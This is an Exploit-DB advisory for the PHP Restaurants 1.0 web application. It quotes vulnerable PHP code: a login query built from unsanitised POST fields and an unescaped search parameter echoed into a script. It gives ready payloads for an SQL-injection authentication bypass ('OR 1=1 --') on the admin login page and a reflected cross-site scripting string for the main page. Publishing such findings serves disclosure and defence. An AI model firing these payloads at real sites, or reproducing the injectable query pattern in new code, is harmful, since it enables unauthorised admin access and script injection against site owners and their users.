PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting

EDB-ID:

51398

CVE:

N/A




Platform:

PHP

Date:

2023-05-02


# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS)
# Google Dork: None
# Date: 4/26/2023
# Exploit Author: Or4nG.M4n
# Vendor Homepage: https://github.com/jcwebhole
# Software Link: https://github.com/jcwebhole/php_restaurants
# Version: 1.0


functions.php

function login(){
global $conn;
$email = $_POST['email'];
$pw = $_POST['password'];

$sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` =
'".md5($pw)."'"; <-- there is No filter to secure sql query
parm[email][password]
$result = $conn->query($sql);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day
header('location: index.php');
}
} else {
header('location: login.php?m=Wrong Password');
}

}

login bypass at admin page /rest1/admin/login.php

email & password : ' OR 1=1 --             <- add [space] end of the payload

cross site scripting main page /index.php

xhttp.open("GET", "functions.php?f=getRestaurants<?php
  if(isset($_GET['search'])) echo '&search='.$_GET['search']; <-- here we
can insert our xss payload
?>
  ", true);
xhttp.send();

</script> <-- when you insert your'e payload don't forget to add </script>
like

xss payload : </script><img onerror=alert(1) src=a>